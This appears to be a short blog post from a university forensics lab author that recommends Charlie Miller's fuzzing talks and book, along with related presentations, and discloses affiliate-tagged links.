Charlie actually recommends three other presentations on fuzzing within his slidedeck:

Fuzz by Number - Charlie Miller, 2008

!exploitable and Effective Fuzzing Strategies as a Regular Part of Testing - Jason Shirk, 2009

Effective Fuzzing Strategies - David Molnar and Lars Opstad, 2010

If you are responsible for ANY application security, you really need to evaluate Charlie's methods. His setup involved fuzzing for three weeks on five Mac OS boxes. Surely the authors of major web browsers can afford a setup of at least that complexity? Hmmmm....(dear students, what do you think *WE* could set up???)

Charlie's Fuzzing book is available at Amazon.com:

Fuzzing for Software Security Testing and Quality Assurance

Be sure to follow Charlie on Twitter if this is a topic of interest to you:

http://twitter.com/0xcharlie


(Full Disclosure: For the observant, yes, the Amazon links in this presentation are affiliate-tagged. If enough of you buy the books, my copy is free. When I buy security books they go in my library for students in the UAB Computer Forensics Research lab to use. If you want to send us free books some other way, that's cool, too. 8-)